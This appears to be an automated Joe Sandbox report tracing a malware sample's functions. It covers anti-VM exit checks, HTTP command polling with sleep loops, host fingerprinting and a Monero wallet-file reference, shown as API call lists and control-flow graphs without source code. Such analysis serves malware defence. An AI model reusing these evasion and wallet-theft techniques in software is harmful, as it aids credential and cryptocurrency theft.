                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                    • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • InternetOpenA.WININET(00D50DFE,00000001,00000000,00000000,00000000), ref: 00D362E1
                  • StrCmpCA.SHLWAPI(?,00AFE9F8), ref: 00D36303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36335
                  • HttpOpenRequestA.WININET(00000000,GET,?,00AFE218,00000000,00000000,00400100,00000000), ref: 00D36385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D363BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D363D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00D363FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D3646D
                  • InternetCloseHandle.WININET(00000000), ref: 00D364EF
                  • InternetCloseHandle.WININET(00000000), ref: 00D364F9
                  • InternetCloseHandle.WININET(00000000), ref: 00D36503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 8f70f7f9604c9066d9410de66ceeb9a3591f963a343a8105d56a04ce6885404a
                  • Instruction ID: 2577da46c9b6528a0d03d9ddbe5fa3db44c0c9ebfe01b7f52115247d2d186c0d
                  • Opcode Fuzzy Hash: 8f70f7f9604c9066d9410de66ceeb9a3591f963a343a8105d56a04ce6885404a
                  • Instruction Fuzzy Hash: F8715F71A40218ABEB24DFA4CC49BEE7778FF44701F108198F5096B190DBB4AA85CF62
                  Function 00D45510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1090 d45510-d45577 call d45ad0 call d4a820 * 3 call d4a740 * 4 1106 d4557c-d45583 1090->1106 1107 d45585-d455b6 call d4a820 call d4a7a0 call d31590 call d451f0 1106->1107 1108 d455d7-d4564c call d4a740 * 2 call d31590 call d452c0 call d4a8a0 call d4a800 call d4aad0 StrCmpCA 1106->1108 1124 d455bb-d455d2 call d4a8a0 call d4a800 1107->1124 1134 d45693-d456a9 call d4aad0 StrCmpCA 1108->1134 1138 d4564e-d4568e call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1108->1138 1124->1134 1139 d457dc-d45844 call d4a8a0 call d4a820 * 2 call d31670 call d4a800 * 4 call d46560 call d31550 1134->1139 1140 d456af-d456b6 1134->1140 1138->1134 1270 d45ac3-d45ac6 1139->1270 1143 d456bc-d456c3 1140->1143 1144 d457da-d4585f call d4aad0 StrCmpCA 1140->1144 1148 d456c5-d45719 call d4a820 call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1143->1148 1149 d4571e-d45793 call d4a740 * 2 call d31590 call d452c0 call d4a8a0 call d4a800 call d4aad0 StrCmpCA 1143->1149 1163 d45865-d4586c 1144->1163 1164 d45991-d459f9 call d4a8a0 call d4a820 * 2 call d31670 call d4a800 * 4 call d46560 call d31550 1144->1164 1148->1144 1149->1144 1249 d45795-d457d5 call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1149->1249 1170 d45872-d45879 1163->1170 1171 d4598f-d45a14 call d4aad0 StrCmpCA 1163->1171 1164->1270 1178 d458d3-d45948 call d4a740 * 2 call d31590 call d452c0 call d4a8a0 call d4a800 call d4aad0 StrCmpCA 1170->1178 1179 d4587b-d458ce call d4a820 call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1170->1179 1199 d45a16-d45a21 Sleep 1171->1199 1200 d45a28-d45a91 call d4a8a0 call d4a820 * 2 call d31670 call d4a800 * 4 call d46560 call d31550 1171->1200 1178->1171 1275 d4594a-d4598a call d4a7a0 call d31590 call d451f0 call d4a8a0 call d4a800 1178->1275 1179->1171 1199->1106 1200->1270 1249->1144 1275->1171
                  APIs
                    • Part of subcall function 00D4A820: lstrlen.KERNEL32(00D34F05,?,?,00D34F05,00D50DDE), ref: 00D4A82B
                    • Part of subcall function 00D4A820: lstrcpy.KERNEL32(00D50DDE,00000000), ref: 00D4A885
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D456A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45857
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45228
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45318
                    • Part of subcall function 00D452C0: lstrlen.KERNEL32(00000000), ref: 00D4532F
                    • Part of subcall function 00D452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00D45364
                    • Part of subcall function 00D452C0: lstrlen.KERNEL32(00000000), ref: 00D45383
                    • Part of subcall function 00D452C0: lstrlen.KERNEL32(00000000), ref: 00D453AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D4578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00D45A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 60628e0114aa94fff99429ac77e60d89df69b7b06214d7b097c1eea3cad2c412
                  • Instruction ID: fab478a7b59183dd729af1a3969306e06b8f6b67735528ee0e4710c51d29941d
                  • Opcode Fuzzy Hash: 60628e0114aa94fff99429ac77e60d89df69b7b06214d7b097c1eea3cad2c412
                  • Instruction Fuzzy Hash: B2E11E769501089BDB14FBB4EC97AED7338EF94300F508528B50666196EF34AA4DCBB3
                  Function 00D417A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1301 d417a0-d417cd call d4aad0 StrCmpCA 1304 d417d7-d417f1 call d4aad0 1301->1304 1305 d417cf-d417d1 ExitProcess 1301->1305 1309 d417f4-d417f8 1304->1309 1310 d419c2-d419cd call d4a800 1309->1310 1311 d417fe-d41811 1309->1311 1312 d41817-d4181a 1311->1312 1313 d4199e-d419bd 1311->1313 1315 d41835-d41844 call d4a820 1312->1315 1316 d41970-d41981 StrCmpCA 1312->1316 1317 d418f1-d41902 StrCmpCA 1312->1317 1318 d41951-d41962 StrCmpCA 1312->1318 1319 d41932-d41943 StrCmpCA 1312->1319 1320 d41913-d41924 StrCmpCA 1312->1320 1321 d4185d-d4186e StrCmpCA 1312->1321 1322 d4187f-d41890 StrCmpCA 1312->1322 1323 d41821-d41830 call d4a820 1312->1323 1324 d418ad-d418be StrCmpCA 1312->1324 1325 d418cf-d418e0 StrCmpCA 1312->1325 1326 d4198f-d41999 call d4a820 1312->1326 1327 d41849-d41858 call d4a820 1312->1327 1313->1309 1315->1313 1342 d41983-d41986 1316->1342 1343 d4198d 1316->1343 1333 d41904-d41907 1317->1333 1334 d4190e 1317->1334 1339 d41964-d41967 1318->1339 1340 d4196e 1318->1340 1337 d41945-d41948 1319->1337 1338 d4194f 1319->1338 1335 d41926-d41929 1320->1335 1336 d41930 1320->1336 1348 d41870-d41873 1321->1348 1349 d4187a 1321->1349 1350 d41892-d4189c 1322->1350 1351 d4189e-d418a1 1322->1351 1323->1313 1329 d418c0-d418c3 1324->1329 1330 d418ca 1324->1330 1331 d418e2-d418e5 1325->1331 1332 d418ec 1325->1332 1326->1313 1327->1313 1329->1330 1330->1313 1331->1332 1332->1313 1333->1334 1334->1313 1335->1336 1336->1313 1337->1338 1338->1313 1339->1340 1340->1313 1342->1343 1343->1313 1348->1349 1349->1313 1352 d418a8 1350->1352 1351->1352 1352->1313
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00D417C5
                  • ExitProcess.KERNEL32 ref: 00D417D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: ba09733f58bda216976868856735533b5fe4fd62fb778c381bd05b835522b8b7
                  • Instruction ID: 0b7e8ce9fbb2a06378773ec1a81d63dab4b6e09715817063f2098291636555b0
                  • Opcode Fuzzy Hash: ba09733f58bda216976868856735533b5fe4fd62fb778c381bd05b835522b8b7
                  • Instruction Fuzzy Hash: B65143B8A1420AEFDB04DFA4D954BBE7BB5BB44305F108049E816AB240D770E985DF72
                  Function 00D47500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1356 d47500-d4754a GetWindowsDirectoryA 1357 d47553-d475c7 GetVolumeInformationA call d48d00 * 3 1356->1357 1358 d4754c 1356->1358 1365 d475d8-d475df 1357->1365 1358->1357 1366 d475e1-d475fa call d48d00 1365->1366 1367 d475fc-d47617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 d47628-d47658 wsprintfA call d4a740 1367->1369 1370 d47619-d47626 call d4a740 1367->1370 1377 d4767e-d4768e 1369->1377 1370->1377
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00D47542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D4760A
                  • wsprintfA.USER32 ref: 00D47640
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 431532822bc1db18e4264fe4e2c3d7d50ac6733e5ece21c070799c20d7221744
                  • Instruction ID: 5e7afc32cd026c07d18de93a34a216481f68d57a9a25cda5a408f8625ea13496
                  • Opcode Fuzzy Hash: 431532822bc1db18e4264fe4e2c3d7d50ac6733e5ece21c070799c20d7221744
                  • Instruction Fuzzy Hash: 744181B1D04248ABDF10DF94DC45BEEBBB8EF48704F144199F50967280D774AA84CBB6
                  Function 00D469F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2380), ref: 00D498A1
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2260), ref: 00D498BA
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2308), ref: 00D498D2
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF22C0), ref: 00D498EA
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2218), ref: 00D49903
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF8F98), ref: 00D4991B
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AE5AF0), ref: 00D49933
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AE5C90), ref: 00D4994C
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF23B0), ref: 00D49964
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2470), ref: 00D4997C
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2440), ref: 00D49995
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2458), ref: 00D499AD
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AE5D70), ref: 00D499C5
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF24A0), ref: 00D499DE
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D311D0: ExitProcess.KERNEL32 ref: 00D31211
                    • Part of subcall function 00D31160: GetSystemInfo.KERNEL32(?), ref: 00D3116A
                    • Part of subcall function 00D31160: ExitProcess.KERNEL32 ref: 00D3117E
                    • Part of subcall function 00D31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D3112B
                    • Part of subcall function 00D31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00D31132
                    • Part of subcall function 00D31110: ExitProcess.KERNEL32 ref: 00D31143
                    • Part of subcall function 00D31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D3123E
                    • Part of subcall function 00D31220: __aulldiv.LIBCMT ref: 00D31258
                    • Part of subcall function 00D31220: __aulldiv.LIBCMT ref: 00D31266
                    • Part of subcall function 00D31220: ExitProcess.KERNEL32 ref: 00D31294
                    • Part of subcall function 00D46770: GetUserDefaultLangID.KERNEL32 ref: 00D46774
                    • Part of subcall function 00D31190: ExitProcess.KERNEL32 ref: 00D311C6
                    • Part of subcall function 00D47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47880
                    • Part of subcall function 00D47850: RtlAllocateHeap.NTDLL(00000000), ref: 00D47887
                    • Part of subcall function 00D47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D4789F
                    • Part of subcall function 00D478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47910
                    • Part of subcall function 00D478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D47917
                    • Part of subcall function 00D478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00D4792F
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00AF8F08,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D46AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00D46AF9
                  • Sleep.KERNEL32(00001770), ref: 00D46B04
                  • CloseHandle.KERNEL32(?,00000000,?,00AF8F08,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46B1A
                  • ExitProcess.KERNEL32 ref: 00D46B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 741ff3814728a27feb226640984db7457a8b92567368ce9090b07525f494bea9
                  • Instruction ID: daf7506ad8c9c499867baae75680c784f06872c1690c24ecbf5fc35296239abb
                  • Opcode Fuzzy Hash: 741ff3814728a27feb226640984db7457a8b92567368ce9090b07525f494bea9
                  • Instruction Fuzzy Hash: B6312870940209ABEB04FBF4DC56BEE7778EF44341F414518F602A2182DF70A945CAB3
                  Function 00D31220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1436 d31220-d31247 call d489b0 GlobalMemoryStatusEx 1439 d31273-d3127a 1436->1439 1440 d31249-d31271 call d4da00 * 2 1436->1440 1441 d31281-d31285 1439->1441 1440->1441 1443 d31287 1441->1443 1444 d3129a-d3129d 1441->1444 1447 d31292-d31294 ExitProcess 1443->1447 1448 d31289-d31290 1443->1448 1448->1444 1448->1447
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D3123E
                  • __aulldiv.LIBCMT ref: 00D31258
                  • __aulldiv.LIBCMT ref: 00D31266
                  • ExitProcess.KERNEL32 ref: 00D31294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 62a4dab229024cfaf238bf2833ce69ffba03aa6233bfda1984ec2262e0d8b4b0
                  • Instruction ID: fd73c530da668f46597e26511e9cfa144752eb07a4bfa1de234f005ff74c8c19
                  • Opcode Fuzzy Hash: 62a4dab229024cfaf238bf2833ce69ffba03aa6233bfda1984ec2262e0d8b4b0
                  • Instruction Fuzzy Hash: 3A016DB4D40309BBEB10EFE4CC4AB9EBBB8EB14705F248048E705B62C0D77495418BAD
                  Function 00D46AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1450 d46af3 1451 d46b0a 1450->1451 1453 d46b0c-d46b22 call d46920 call d45b10 CloseHandle ExitProcess 1451->1453 1454 d46aba-d46ad7 call d4aad0 OpenEventA 1451->1454 1459 d46af5-d46b04 CloseHandle Sleep 1454->1459 1460 d46ad9-d46af1 call d4aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00AF8F08,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D46AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00D46AF9
                  • Sleep.KERNEL32(00001770), ref: 00D46B04
                  • CloseHandle.KERNEL32(?,00000000,?,00AF8F08,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46B1A
                  • ExitProcess.KERNEL32 ref: 00D46B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
